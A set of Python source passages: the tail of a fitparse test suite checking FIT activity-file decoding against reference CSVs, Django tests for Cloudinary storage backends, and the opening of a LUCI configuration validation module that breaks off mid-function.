        self.assertEqual(file_id.get_value(key), secs_to_dt(723842606))
        self.assertEqual(file_id.get(key).raw_value, 723842606)
    for key in ('number', 5):
        # (2 ** 16) - 1 is the uint16 invalid marker, so the field decodes to None.
        self.assertEqual(file_id.get_value(key), None)
def test_basic_file_big_endian(self):
    """Re-run the single-record checks with big-endian message payloads."""
    self.test_basic_file_with_one_record('>')
def test_component_field_accumulaters(self):
    """Verify accumulated compressed speed/distance values against the reference CSV.

    Fix: the CSV file handle is now opened with a context manager, so it is
    closed even when an assertion fails mid-loop (it previously leaked).
    """
    # TODO: abstract CSV parsing
    with open(testfile('compressed-speed-distance-records.csv'), 'r') as csv_fp:
        csv_file = csv.reader(csv_fp)
        next(csv_file)  # Consume header
        f = FitFile(testfile('compressed-speed-distance.fit'))
        f.parse()
        records = f.get_messages(name='record')
        empty_record = next(records)  # Skip empty record for now (sets timestamp via header)
        # File's timestamp record is < 0x10000000, so field returns seconds
        self.assertEqual(empty_record.get_value('timestamp'), 17217864)
        # TODO: update using local_timestamp as offset, since we have this value as 2012 date
        for count, (record, (timestamp, heartrate, speed, distance, cadence)) in enumerate(zip(records, csv_file)):
            # No fancy datetime stuff, since timestamp record is < 0x10000000
            fit_ts = record.get_value('timestamp')
            self.assertIsInstance(fit_ts, int)
            self.assertLess(fit_ts, 0x10000000)
            self.assertEqual(fit_ts, int(timestamp))
            self.assertEqual(record.get_value('heart_rate'), int(heartrate))
            self.assertEqual(record.get_value('cadence'), int(cadence) if cadence != 'null' else None)
            self.assertAlmostEqual(record.get_value('speed'), float(speed))
            self.assertAlmostEqual(record.get_value('distance'), float(distance))
        self.assertEqual(count, 753)  # TODO: confirm size(records) = size(csv)
def test_component_field_resolves_subfield(self):
    """A data16 component should expand into the timer_trigger subfield."""
    raw = generate_fitfile(
        generate_messages(
            # event (21), local message 1
            mesg_num=21, local_mesg_num=1, field_defs=[
                # event, event_type, data16
                (0, 'enum'), (1, 'enum'), (2, 'uint16'),
            ],
            data=[[0, 0, 2]],
        )
    )
    fitfile = FitFile(raw)
    fitfile.parse()
    event = fitfile.messages[1]
    self.assertEqual(event.name, 'event')
    for key in ('event', 0):
        self.assertEqual(event.get_value(key), 'timer')
        self.assertEqual(event.get(key).raw_value, 0)
    for key in ('event_type', 1):
        self.assertEqual(event.get_value(key), 'start')
        self.assertEqual(event.get(key).raw_value, 0)
    # The expanded value must be reachable by original field name, component
    # field name, subfield name, and the def_nums of both original and
    # component fields.
    for key in ('timer_trigger', 'data', 3):
        self.assertEqual(event.get_value(key), 'fitness_equipment')
        self.assertEqual(event.get(key).raw_value, 2)
    # The component field itself is left untouched.
    for key in ('data16', 2):
        self.assertEqual(event.get_value(key), 2)
def test_subfield_components(self):
    """Subfield component expansion for event messages (sport_point, gear change)."""
    # score = 123 in the low word, opponent_score = 456 in the high word.
    sport_point_value = 123 + (456 << 16)
    # Packed bytes, low to high: rear_gear_num = 4, rear_gear = 20,
    # front_gear_num = 2, front_gear = 34.
    gear_change_value = 4 + (20 << 8) + (2 << 16) + (34 << 24)
    raw = generate_fitfile(
        generate_messages(
            # event (21), local message 1
            mesg_num=21, local_mesg_num=1, field_defs=[
                # event, data
                (0, 'enum'), (3, 'uint32'),
            ],
            data=[
                # sport point
                [33, sport_point_value],
                # front gear change
                [42, gear_change_value],
            ],
        )
    )
    fitfile = FitFile(raw)
    fitfile.parse()
    sport_point = fitfile.messages[1]
    self.assertEqual(sport_point.name, 'event')
    for key in ('event', 0):
        self.assertEqual(sport_point.get_value(key), 'sport_point')
        self.assertEqual(sport_point.get(key).raw_value, 33)
    for key in ('sport_point', 'data', 3):
        # The packed value itself stays reachable under the subfield name.
        self.assertEqual(sport_point.get_value(key), sport_point_value)
    for key in ('score', 7):
        self.assertEqual(sport_point.get_value(key), 123)
    for key in ('opponent_score', 8):
        self.assertEqual(sport_point.get_value(key), 456)
    gear_change = fitfile.messages[2]
    self.assertEqual(gear_change.name, 'event')
    for key in ('event', 0):
        self.assertEqual(gear_change.get_value(key), 'front_gear_change')
        self.assertEqual(gear_change.get(key).raw_value, 42)
    for key in ('gear_change_data', 'data', 3):
        # The packed value itself stays reachable under the subfield name.
        self.assertEqual(gear_change.get_value(key), gear_change_value)
    for key in ('front_gear_num', 9):
        self.assertEqual(gear_change.get_value(key), 2)
    for key in ('front_gear', 10):
        self.assertEqual(gear_change.get_value(key), 34)
    for key in ('rear_gear_num', 11):
        self.assertEqual(gear_change.get_value(key), 4)
    for key in ('rear_gear', 12):
        self.assertEqual(gear_change.get_value(key), 20)
def test_parsing_edge_500_fit_file(self):
    """Garmin Edge 500 activity file matches its reference CSV dump."""
    self._csv_test_helper(
        'garmin-edge-500-activity.fit',
        'garmin-edge-500-activity-records.csv')
def test_parsing_fenix_5_bike_fit_file(self):
    """Garmin Fenix 5 bike file matches its reference CSV dump."""
    self._csv_test_helper(
        'garmin-fenix-5-bike.fit',
        'garmin-fenix-5-bike-records.csv')
def test_parsing_fenix_5_run_fit_file(self):
    """Garmin Fenix 5 run file matches its reference CSV dump."""
    self._csv_test_helper(
        'garmin-fenix-5-run.fit',
        'garmin-fenix-5-run-records.csv')
def test_parsing_fenix_5_walk_fit_file(self):
    """Garmin Fenix 5 walk file matches its reference CSV dump."""
    self._csv_test_helper(
        'garmin-fenix-5-walk.fit',
        'garmin-fenix-5-walk-records.csv')
def test_parsing_edge_820_fit_file(self):
    """Garmin Edge 820 bike file matches its reference CSV dump."""
    self._csv_test_helper(
        'garmin-edge-820-bike.fit',
        'garmin-edge-820-bike-records.csv')
def _csv_test_helper(self, fit_file, csv_file):
    """Compares every 'record' message in fit_file with the reference CSV.

    The CSV is a dump produced by the ANT FIT SDK Dump tool. Known quirks of
    that tool (invalid cadence logged as 0, invalid lat/long logged as the
    last valid fix) are compensated for before comparing values.

    Args:
        fit_file: file name of the .FIT fixture (resolved via testfile()).
        csv_file: file name of the reference CSV dump.
    """
    # `with` guarantees the CSV handle is closed even when an assert fails
    # (the original leaked it on failure).
    with open(testfile(csv_file), 'r') as csv_fp:
        csv_messages = csv.reader(csv_fp)
        field_names = next(csv_messages)  # Consume header row
        f = FitFile(testfile(fit_file))
        messages = f.get_messages(name='record')
        # Last valid GPS fix, used below to patch over invalid samples.
        last_valid_lat, last_valid_long = None, None
        for message, csv_message in zip(messages, csv_messages):
            for csv_index, field_name in enumerate(field_names):
                fit_value = message.get_value(field_name)
                csv_value = csv_message[csv_index]
                if field_name == 'timestamp':
                    # Adjust GMT to PDT and format like the reference dump.
                    fit_value = (fit_value - datetime.timedelta(hours=7)).strftime(
                        "%a %b %d %H:%M:%S PDT %Y")
                # Track last valid lat/longs
                if field_name == 'position_lat' and fit_value is not None:
                    last_valid_lat = fit_value
                if field_name == 'position_long' and fit_value is not None:
                    last_valid_long = fit_value
                # ANT FIT SDK Dump tool does a bad job of logging invalids,
                # so fix them up before comparing.
                if fit_value is None:
                    # ANT FIT SDK Dump tool cadence reports invalid as 0
                    if field_name == 'cadence' and csv_value == '0':
                        csv_value = None
                    # ANT FIT SDK Dump tool invalid lat/lng reports as last valid
                    if field_name == 'position_lat':
                        fit_value = last_valid_lat
                    if field_name == 'position_long':
                        fit_value = last_valid_long
                # Empty CSV cell means "no value".
                if csv_value == '':
                    csv_value = None
                # BUGFIX: the original did `csv_value = int(fit_value)`,
                # which made every integer comparison vacuously pass.
                if isinstance(fit_value, int) and csv_value is not None:
                    csv_value = int(csv_value)
                if isinstance(fit_value, float):
                    # Float comparison
                    self.assertAlmostEqual(fit_value, float(csv_value))
                else:
                    self.assertEqual(
                        fit_value, csv_value,
                        msg="For %s, FIT value '%s' did not match CSV value '%s'"
                            % (field_name, fit_value, csv_value))
        # Both iterators must now be exhausted (same number of records).
        try:
            next(messages)
            self.fail(".FIT file had more than csv file")
        except StopIteration:
            pass
        try:
            next(csv_messages)
            self.fail(".CSV file had more messages than .FIT file")
        except StopIteration:
            pass
def test_developer_types(self):
    """Test that a file with developer types in it can be parsed"""
    for sample in ('developer-types-sample.fit',
                   '20170518-191602-1740899583.fit',
                   'DeveloperData.fit'):
        FitFile(testfile(sample)).parse()
def test_invalid_crc(self):
    """A file with a corrupted CRC must raise FitCRCError.

    Uses the assertRaises context manager instead of the try/fail/except
    pattern for clarity and a precise failure message.
    """
    with self.assertRaises(FitCRCError):
        FitFile(testfile('activity-filecrc.fit')).parse()
def test_unexpected_eof(self):
    """A truncated file must raise FitEOFError."""
    # Warnings emitted while parsing the truncated file are suppressed.
    with self.assertRaises(FitEOFError):
        with warnings.catch_warnings(record=True):
            FitFile(testfile('activity-unexpected-eof.fit')).parse()
def test_chained_file(self):
    """Two valid FIT files concatenated together parse cleanly."""
    chained = testfile('activity-settings.fit')
    FitFile(chained).parse()
def test_invalid_chained_files(self):
    """Detect errors when files are chained together.

    Note that 'chained' means just concatenated in this case. Each fixture
    has a valid first file followed by a defective second one; the parser
    must report the defect rather than silently stop. (Also fixes the
    'concatinated'/'chaned' typos from the original.)
    """
    # CRC error in the second file of the chain.
    with self.assertRaises(FitCRCError):
        FitFile(testfile('activity-activity-filecrc.fit')).parse()
    # Corrupt header in the second file of the chain.
    with self.assertRaises(FitHeaderError):
        FitFile(testfile('activity-settings-corruptheader.fit')).parse()
    # Chained file whose second part has a header but no data.
    with self.assertRaises(FitEOFError):
        FitFile(testfile('activity-settings-nodata.fit')).parse()
def test_valid_files(self):
    """Test that parsing a bunch of random known-good files works"""
    known_good = (
        '2013-02-06-12-11-14.fit', '2015-10-13-08-43-15.fit',
        'Activity.fit', 'Edge810-Vector-2013-08-16-15-35-10.fit',
        'MonitoringFile.fit', 'Settings.fit', 'Settings2.fit',
        'WeightScaleMultiUser.fit', 'WeightScaleSingleUser.fit',
        'WorkoutCustomTargetValues.fit', 'WorkoutIndividualSteps.fit',
        'WorkoutRepeatGreaterThanStep.fit', 'WorkoutRepeatSteps.fit',
        'activity-large-fenxi2-multisport.fit', 'activity-small-fenix2-run.fit',
        'antfs-dump.63.fit', 'sample-activity-indoor-trainer.fit',
        'sample-activity.fit', 'garmin-fenix-5-bike.fit',
        'garmin-fenix-5-run.fit', 'garmin-fenix-5-walk.fit',
        'garmin-edge-820-bike.fit', 'null_compressed_speed_dist.fit')
    for sample in known_good:
        FitFile(testfile(sample)).parse()
def test_units_processor(self):
    """Known-good files also parse with the standard-units data processor."""
    samples = (
        '2013-02-06-12-11-14.fit', '2015-10-13-08-43-15.fit',
        'Activity.fit', 'Edge810-Vector-2013-08-16-15-35-10.fit',
        'MonitoringFile.fit', 'Settings.fit', 'Settings2.fit',
        'WeightScaleMultiUser.fit', 'WeightScaleSingleUser.fit',
        'WorkoutCustomTargetValues.fit', 'WorkoutIndividualSteps.fit',
        'WorkoutRepeatGreaterThanStep.fit', 'WorkoutRepeatSteps.fit',
        'activity-large-fenxi2-multisport.fit', 'activity-small-fenix2-run.fit',
        'antfs-dump.63.fit', 'sample-activity-indoor-trainer.fit',
        'sample-activity.fit', 'garmin-fenix-5-bike.fit',
        'garmin-fenix-5-run.fit', 'garmin-fenix-5-walk.fit',
        'garmin-edge-820-bike.fit')
    for sample in samples:
        FitFile(testfile(sample),
                data_processor=StandardUnitsDataProcessor()).parse()
def test_int_long(self):
    """Test that ints are properly shifted and scaled.

    Uses assertEqual instead of a bare assert (bare asserts are stripped
    under python -O and give no diagnostic on failure). The expected value
    is a float because the raw value carries a scale factor.
    """
    with FitFile(testfile('event_timestamp.fit')) as f:
        self.assertEqual(f.messages[-1].fields[1].raw_value, 863.486328125)
def test_elemnt_bolt_developer_data_id_without_application_id(self):
    """developer_data_id without an application id must still parse.

    As seen on ELEMNT BOLT with firmware version WB09-1507.
    """
    sample = 'elemnt-bolt-no-application-id-inside-developer-data-id.fit'
    FitFile(testfile(sample)).parse()
def test_multiple_header(self):
    """A file containing multiple headers yields all chained messages.

    Uses assertEqual instead of a bare assert (stripped under python -O).
    Note: the fixture file name really is spelled 'mulitple'.
    """
    f = FitFile(testfile('sample_mulitple_header.fit'))
    self.assertEqual(len(f.messages), 3023)
def test_speed(self):
    """avg_speed of the first session message has the expected scaled value."""
    fit = FitFile(testfile('2019-02-17-062644-ELEMNT-297E-195-0.fit'))
    sessions = list(fit.get_messages('session'))
    first_session_values = sessions[0].get_values()
    self.assertEqual(first_session_values.get('avg_speed'), 5.86)
def test_mismatched_field_size(self):
    """Misaligned fields fall back to byte decoding with a warning.

    Replaces bare asserts (stripped under python -O) with unittest asserts.
    """
    f = FitFile(testfile('coros-pace-2-cycling-misaligned-fields.fit'))
    with warnings.catch_warnings(record=True) as caught:
        f.parse()
    self.assertTrue(caught)
    self.assertTrue(
        all("falling back to byte encoding" in str(w) for w in caught))
    self.assertEqual(len(f.messages), 11293)
def test_unterminated_file(self):
    """An unterminated file parses when CRC checking is disabled.

    Warnings are suppressed but not inspected, so the unused `as w`
    binding from the original is dropped.
    """
    f = FitFile(testfile('nick.fit'), check_crc=False)
    with warnings.catch_warnings(record=True):
        f.parse()
def test_developer_data_thread_safe(self):
    """
    Test that a file with developer types in it can be parsed thread-safe.
    This test opens 2 FIT files and tests whether the dev_types of one
    does not change the dev_types of the other.
    """
    first = FitFile(testfile('developer-types-sample.fit'))
    seen_field_descriptions = 0
    for msg in first.get_messages():
        if msg.mesg_type.name == "field_description":
            seen_field_descriptions += 1
            if seen_field_descriptions >= 4:
                # Break after final field description message
                break
    # Partially parse a second copy so its dev types get registered too.
    second = FitFile(testfile('developer-types-sample.fit'))
    for msg in second.get_messages():
        if msg.mesg_type.name == "developer_data_id":
            break
    try:
        first.parse()
    except FitParseError:
        self.fail("parse() unexpectedly raised a FitParseError")
# TODO:
# * Test Processors:
# - process_type_<>, process_field_<>, process_units_<>, process_message_<>
# Allow running this test module directly with `python <file>.py`.
if __name__ == '__main__':
    unittest.main()
|
|
import errno
import os.path
from requests.exceptions import HTTPError
import cloudinary.uploader
from django.test import SimpleTestCase, override_settings
from django.core.files.base import ContentFile
from django.conf import settings
from cloudinary_storage.storage import (MediaCloudinaryStorage, ManifestCloudinaryStorage, StaticCloudinaryStorage,
StaticHashedCloudinaryStorage, RESOURCE_TYPES)
from cloudinary_storage import app_settings
from tests.tests.test_helpers import get_random_name, import_mock
# Mock library resolved by the shared test helpers.
mock = import_mock()
# Random tag attached (via the storage constructors below) to every file
# these tests upload, so test uploads are identifiable.
TAG = get_random_name()
class CloudinaryMediaStorageTests(SimpleTestCase):
    """Integration tests for MediaCloudinaryStorage.

    Most tests exercise the real storage backend (uploads/HTTP mocked only
    where noted). A single shared raw file is uploaded once in setUpClass
    and removed again in tearDownClass.
    """

    @classmethod
    def setUpClass(cls):
        """Uploads one shared fixture file that read-only tests reuse."""
        super(CloudinaryMediaStorageTests, cls).setUpClass()
        cls.file_content = b'Content of file'
        cls.storage = MediaCloudinaryStorage(tag=TAG, resource_type='raw')
        cls.file_name, cls.file = cls.upload_file()

    @classmethod
    def upload_file(cls, prefix='', directory_name=''):
        """Uploads a randomly named file; returns (stored name, content)."""
        file_name = prefix + directory_name + get_random_name()
        content = ContentFile(cls.file_content)
        # save() may return a name different from the requested one.
        file_name = cls.storage.save(file_name, content)
        return file_name, content

    def test_file_exists_after_upload(self):
        self.assertTrue(self.storage.exists(self.file_name))

    def test_file_doesnt_exist_without_upload(self):
        file_name = get_random_name()
        self.assertFalse(self.storage.exists(file_name))

    def test_file_doesnt_exists_after_deletion(self):
        file_name, file = self.upload_file()
        self.storage.delete(file_name)
        self.assertFalse(self.storage.exists(file_name))

    @mock.patch('cloudinary_storage.storage.requests.head')
    def test_exists_raises_http_error(self, head_mock):
        """An error response during the existence check propagates as HTTPError."""
        response = head_mock.return_value
        response.status_code = 500
        response.raise_for_status.side_effect = HTTPError
        with self.assertRaises(HTTPError):
            self.storage.exists(get_random_name())

    def test_delete_returns_true_when_file_existed(self):
        file_name, file = self.upload_file()
        self.assertTrue(self.storage.delete(file_name))

    def test_delete_returns_false_when_file_didnt_exist(self):
        file_name = get_random_name()
        self.assertFalse(self.storage.delete(file_name))

    def test_url(self):
        url = self.storage.url('name')
        self.assertTrue(url.startswith('http'))

    def test_size_of_existing_file(self):
        size = self.storage.size(self.file_name)
        self.assertEqual(size, self.file.size)

    def test_size_of_not_existing_file_returns_none(self):
        file_name = get_random_name()
        size = self.storage.size(file_name)
        self.assertEqual(size, None)

    def test_opened_file_has_correct_content(self):
        file = self.storage.open(self.file_name)
        self.assertEqual(file.read(), self.file_content)

    def test_opening_not_existing_file_raises_error(self):
        with self.assertRaises(IOError):
            self.storage.open('name')

    @mock.patch('cloudinary_storage.storage.requests.get')
    def test_opening_when_cloudinary_fails_raises_error(self, get_mock):
        """A 500 response while fetching the file surfaces as IOError."""
        response = get_mock.return_value
        response.status_code = 500
        response.raise_for_status.side_effect = HTTPError
        with self.assertRaises(IOError):
            self.storage.open('name')

    def test_get_available_name(self):
        # The storage returns the requested name unchanged (no uniquification).
        name = 'name'
        available_name = self.storage.get_available_name(name)
        self.assertEqual(name, available_name)

    def test_get_available_name_with_max_length(self):
        # Names longer than max_length are truncated.
        name = 'name'
        available_name = self.storage.get_available_name(name, 2)
        self.assertEqual('na', available_name)

    def test_get_available_name_with_max_length_bigger_than_name_length(self):
        name = 'name'
        available_name = self.storage.get_available_name(name, 10)
        self.assertEqual(name, available_name)

    def test_list_dir(self):
        """listdir returns a (directories, files) pair at each tree level."""
        file_2_name, file_2 = self.upload_file(prefix='folder/')
        try:
            self.assertEqual(self.storage.listdir(''), (['media'], []))
            file_1_tail = self.file_name.replace('media/', '', 1)
            self.assertEqual(self.storage.listdir('media/'), (['folder'], [file_1_tail]))
            file_2_tail = file_2_name.replace('media/folder/', '', 1)
            self.assertEqual(self.storage.listdir('media/folder'),
                             ([], [file_2_tail]))
        finally:
            self.storage.delete(file_2_name)

    def test_file_with_windows_path_uploaded_and_exists(self):
        file_name, file = self.upload_file(directory_name='windows\\styled\\path\\')
        try:
            self.assertTrue(self.storage.exists(file_name))
        finally:
            self.storage.delete(file_name)

    def test_prefix_configuration(self):
        with override_settings(CLOUDINARY_STORAGE={'PREFIX': 'test/prefix'}):
            self.assertEqual(self.storage._get_prefix(), 'test/prefix')
            self.assertTrue(self.storage._prepend_prefix('filename').startswith('test/prefix'))

    @classmethod
    def tearDownClass(cls):
        """Removes the shared fixture uploaded in setUpClass."""
        super(CloudinaryMediaStorageTests, cls).tearDownClass()
        cls.storage.delete(cls.file_name)
class ManifestCloudinaryStorageTests(SimpleTestCase):
    """Tests for ManifestCloudinaryStorage, which writes the manifest locally."""

    def test_manifest_is_saved_to_proper_location(self):
        """A saved manifest must land inside STATICFILES_MANIFEST_ROOT."""
        storage = ManifestCloudinaryStorage()
        manifest_name = 'name'
        storage.save(manifest_name, ContentFile(b'Dummy manifest'))
        expected_path = os.path.join(
            app_settings.STATICFILES_MANIFEST_ROOT, manifest_name)
        try:
            self.assertTrue(os.path.exists(expected_path))
        finally:
            # Best-effort cleanup: a missing file is fine, any other
            # OS error should still fail the test run.
            try:
                os.remove(expected_path)
            except (IOError, OSError) as err:
                if err.errno != errno.ENOENT:
                    raise
class StaticCloudinaryStorageTests(SimpleTestCase):
    """Tests for StaticCloudinaryStorage and its resource-type helpers.

    One static file is uploaded in setUpClass and deleted in tearDownClass;
    the helper-method tests are local and need no network.
    """

    @classmethod
    def setUpClass(cls):
        """Uploads one static file whose name and content the tests reuse."""
        super(StaticCloudinaryStorageTests, cls).setUpClass()
        cls.storage = StaticCloudinaryStorage(tag=get_random_name())
        name = get_random_name()
        cls.content = b'some content'
        cls.file = ContentFile(cls.content)
        cls.name = cls.storage.save(name, cls.file)

    @override_settings(DEBUG=True)
    def test_url_with_debug_true(self):
        # With DEBUG on, urls point at the local STATIC_URL.
        self.assertIn(settings.STATIC_URL, self.storage.url('name'))

    def test_url_with_debug_false(self):
        # Without DEBUG, urls are served from Cloudinary.
        self.assertIn('cloudinary', self.storage.url('name'))

    def test_file_exists_with_the_same_name_as_before_save(self):
        self.assertTrue(self.storage.exists(self.name))

    @mock.patch.object(MediaCloudinaryStorage, '_save')
    def test_file_wont_be_uploaded_with_the_same_content(self, save_mock):
        # Re-saving identical content must skip the upload entirely.
        self.storage.save(self.name, self.file)
        self.assertFalse(save_mock.called)

    @mock.patch.object(MediaCloudinaryStorage, '_save')
    def test_file_will_be_uploaded_with_different_content(self, save_mock):
        changed_file = ContentFile(b'changed content')
        self.storage.save(self.name, changed_file)
        save_mock.assert_called_once_with(self.name, changed_file)

    def test_get_file_extension_returns_none_for_file_without_extension(self):
        extension = self.storage._get_file_extension('file-with-accidental-ending-jpg')
        self.assertIsNone(extension)

    def test_get_file_extension_returns_correct_file_extension(self):
        # Only the last suffix counts as the extension.
        extension = self.storage._get_file_extension('file.png.jpg')
        self.assertEqual(extension, 'jpg')

    def test_get_file_extension_converts_extension_to_lowercase(self):
        extension = self.storage._get_file_extension('file.JPG')
        self.assertEqual(extension, 'jpg')

    def test_get_resource_type_returns_default_resource_type_for_file_without_extension(self):
        resource_type = self.storage._get_resource_type('file-without-extension')
        self.assertEqual(resource_type, self.storage.RESOURCE_TYPE)

    def test_get_resource_type_returns_default_resource_type_for_file_with_js_extension(self):
        resource_type = self.storage._get_resource_type('file.js')
        self.assertEqual(resource_type, self.storage.RESOURCE_TYPE)

    def test_get_resource_type_returns_image_resource_type_for_file_with_jpg_extension(self):
        resource_type = self.storage._get_resource_type('file.jpg')
        self.assertEqual(resource_type, RESOURCE_TYPES['IMAGE'])

    def test_get_resource_type_returns_video_resource_type_for_file_with_avi_extension(self):
        resource_type = self.storage._get_resource_type('file.avi')
        self.assertEqual(resource_type, RESOURCE_TYPES['VIDEO'])

    def test_remove_extension_for_non_raw_file_leaves_name_intact_when_raw_file(self):
        name = self.storage._remove_extension_for_non_raw_file('file.css')
        self.assertEqual(name, 'file.css')

    def test_remove_extension_for_non_raw_file_leaves_name_intact_when_file_without_extension(self):
        name = self.storage._remove_extension_for_non_raw_file('file')
        self.assertEqual(name, 'file')

    def test_remove_extension_for_non_raw_file_removes_extension_when_file_is_jpg(self):
        name = self.storage._remove_extension_for_non_raw_file('file.jpg')
        self.assertEqual(name, 'file')

    @mock.patch.object(cloudinary.uploader, 'upload')
    def test_upload_uses_remove_extension_for_non_raw_file(self, cloudinary_upload_mock):
        # Image uploads should send the public_id without its extension.
        self.storage._upload('name.jpg', 'content')
        resource_type = self.storage._get_resource_type('name.jpg')
        cloudinary_upload_mock.assert_called_once_with('content', public_id='name', resource_type=resource_type,
                                                       invalidate=True, tags=self.storage.TAG)

    @classmethod
    def tearDownClass(cls):
        """Removes the static file uploaded in setUpClass."""
        super(StaticCloudinaryStorageTests, cls).tearDownClass()
        cls.storage.delete(cls.name)
class StaticHashedCloudinaryStorageTests(SimpleTestCase):
    """Unit tests for StaticHashedCloudinaryStorage (everything mocked/local)."""

    @mock.patch('cloudinary_storage.storage.finders.find')
    def test_hashed_name_raises_error_when_file_not_found(self, find_mock):
        """hashed_name must raise ValueError for an unreadable file."""
        storage = StaticHashedCloudinaryStorage()
        missing = get_random_name()
        find_mock.return_value = missing
        with self.assertRaises(ValueError):
            storage.hashed_name(missing)

    def test_existing_manifest_is_deleted_before_new_is_saved(self):
        """save_manifest removes a pre-existing staticfiles.json first."""
        storage = StaticHashedCloudinaryStorage()
        with mock.patch.object(storage, 'manifest_storage') as manifest_mock:
            manifest_mock.exists.return_value = True
            storage.save_manifest()
            manifest_mock.delete.assert_called_once_with('staticfiles.json')

    def test_add_unix_path_keys_to_paths(self):
        """Windows-style keys get unix-style twins added alongside them."""
        storage = StaticHashedCloudinaryStorage()
        paths = {'dir/1': 1, 'dir\\2': 2}
        expected_paths = dict(paths, **{'dir/2': 2})
        storage.add_unix_path_keys_to_paths(paths)
        self.assertEqual(paths, expected_paths)
|
|
# Copyright 2015 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Defines validation rules for configuration files.
Configurations requested with store_last_good=True are automatically validated
against rules defined using this module. Otherwise, validation.is_defined_for
and validation.validate can be used to validate configs in your code.
Example:
# Configs foo.cfg in all project config sets must be valid protobuf messages.
validation.project_config_rule('foo.cfg', config_pb2.FooCfg)
validation.validate('projects/bar', 'foo.cfg', 'invalid content')
# Will raise ValueError
Example with custom validation:
@validation.project_config_rule('foo.cfg', config_pb2.FooCfg)
def validate_foo(cfg, ctx):
if cfg.bar < 0:
ctx.error('bar must be non-negative: %d', cfg.bar)
validation.validate('projects/baz', 'foo.cfg', 'bar: -1')
# Will raise ValueError
"""
import collections
import re
from six.moves import urllib
from . import common
from . import validation_context
# Public API of this module.
__all__ = [
    'Context',
    'Message',
    'RuleSet',
    'is_defined_for',
    'is_valid',
    'project_config_rule',
    'ref_config_rule',
    'rule',
    'self_rule',
    'validate',
]

# Alias: validation messages are defined in validation_context.
Message = validation_context.Message
class Context(validation_context.Context):
    """A validation context that also carries config metadata.

    config_set and path identify the config being validated; the
    service_id / project_id / ref properties are parsed out of config_set.
    """
    config_set = None
    path = None

    def _match_config_set(self, rgx):
        # Matches config_set against rgx; None when config_set is unset
        # or does not match.
        return rgx.match(self.config_set) if self.config_set else None

    @property
    def service_id(self):
        m = self._match_config_set(common.SERVICE_CONFIG_SET_RGX)
        return m.group(1) if m else None

    @property
    def project_id(self):
        # Both plain project config sets and ref config sets carry a
        # project id as their first capture group.
        m = (self._match_config_set(common.PROJECT_CONFIG_SET_RGX) or
             self._match_config_set(common.REF_CONFIG_SET_RGX))
        return m.group(1) if m else None

    @property
    def ref(self):
        m = self._match_config_set(common.REF_CONFIG_SET_RGX)
        return m.group(2) if m else None
def is_valid_service_id(service_id):
    """True if |service_id| matches the service-id grammar."""
    return common.SERVICE_ID_RGX.match(service_id) is not None
def is_valid_project_id(service_id):
    """True if the argument matches the project-id grammar.

    NOTE(review): the parameter is named service_id but is matched against
    PROJECT_ID_RGX — presumably a copy-paste slip. The name is kept as-is
    to avoid breaking keyword callers.
    """
    return common.PROJECT_ID_RGX.match(service_id) is not None
def is_valid_ref_name(ref):
    """True if |ref| matches the ref-name grammar."""
    return common.REF_NAME_RGX.match(ref) is not None
def is_valid_secure_url(url):
    """Returns True for well-formed https URLs; localhost may also use http."""
    parts = urllib.parse.urlparse(url)
    if not parts.netloc:
        return False
    local_hosts = ('localhost', '127.0.0.1', '::1')
    allowed = ('http', 'https') if parts.hostname in local_hosts else ('https',)
    return parts.scheme in allowed
# A (config_set, path) pattern pair describing one category of configs a
# RuleSet can validate; see RuleSet.patterns().
ConfigPattern = collections.namedtuple(
    'ConfigPattern',
    [
        'config_set',  # config_set pattern, see compile_pattern().
        'path',  # path pattern, see compile_pattern().
    ])
def rule(config_set, path, dest_type=None, rule_set=None):
    """Creates a validation rule; may also be used as a decorator.

    Calling the function alone defines a rule that checks a config file is
    convertible to |dest_type|:

        validation.rule('projects/chromium', 'foo.cfg', myconfig_pb2.FooCfg)

    When used as a decorator, the wrapped function performs additional
    validation. It receives:
    * cfg: the converted config to be validated.
    * ctx (Context): used to report validation errors; may have
      "config_set" and/or "path" attributes set.

        @validation.rule('projects/chromium', 'foo.cfg', myconfig_pb2.FooCfg)
        def validate_foo(cfg, ctx):
            if cfg.bar < 0:
                ctx.error('bar cannot be negative: %d', cfg.bar)

    A rule applies to a config only when BOTH the |config_set| and |path|
    patterns match; see compile_pattern's docstring for pattern syntax.

    Args:
        config_set (str): pattern for config set, see compile_pattern.
        path (str): pattern for path, see compile_pattern.
        dest_type (type): if specified, config contents are converted to
            |dest_type| (currently protobuf messages only) before the
            decorated function runs; unconvertible configs are invalid.
        rule_set (RuleSet): target rule set, defaults to the global
            DEFAULT_RULE_SET.

    Returns:
        A Rule. Calling rule.remove() removes it from the rule set.
    """
    target_set = DEFAULT_RULE_SET if rule_set is None else rule_set
    new_rule = Rule(config_set, path, dest_type)
    target_set.add(new_rule)
    return new_rule
def project_config_rule(*args, **kwargs):
    """Shortcut for rule() that targets all project config sets."""
    config_set_pattern = 'regex:%s' % common.PROJECT_CONFIG_SET_RGX.pattern
    return rule(config_set_pattern, *args, **kwargs)
def ref_config_rule(*args, **kwargs):
    """Shortcut for rule() that targets all ref config sets."""
    config_set_pattern = 'regex:%s' % common.REF_CONFIG_SET_RGX.pattern
    return rule(config_set_pattern, *args, **kwargs)
def self_rule(*args, **kwargs):
    """Shortcut for rule() targeting the current app's own config set."""
    own_config_set = common.self_config_set()
    return rule(own_config_set, *args, **kwargs)
def is_defined_for(config_set, path):
    """True if the default rule set has a rule covering (config_set, path)."""
    return DEFAULT_RULE_SET.is_defined_for(config_set, path)
def validate(config_set, path, content, ctx=None):
    """Validates a config against the default rule set.

    Without an explicit ctx, a ValueError is raised on the first error.
    """
    DEFAULT_RULE_SET.validate(config_set, path, content, ctx=ctx)
def is_valid(config_set, path, content):
    """Returns True iff the config passes validation without errors."""
    try:
        validate(config_set, path, content)
    except ValueError:
        return False
    return True
class Rule(object):
    """Validates a config when both config_set and path match its patterns.

    See rule()'s docstring for more info.
    """

    # Back-reference to the owning RuleSet; set by RuleSet.add().
    rule_set = None

    def __init__(self, config_set, path, dest_type=None):
        self.config_set = config_set
        self.path = path
        self.config_set_fn = compile_pattern(config_set)
        self.path_fn = compile_pattern(path)
        common._validate_dest_type(dest_type)
        self.dest_type = dest_type
        self.validator_funcs = []

    def match(self, config_set, path):
        """Truthy iff this rule is applicable to |config_set| and |path|."""
        return self.config_set_fn(config_set) and self.path_fn(path)

    def validate(self, config_set, path, content, ctx):
        """Converts |content| and runs every registered validator on it."""
        try:
            cfg = common._convert_config(content, self.dest_type)
        except common.ConfigFormatError as ex:
            # A config that cannot even be converted is reported and skipped.
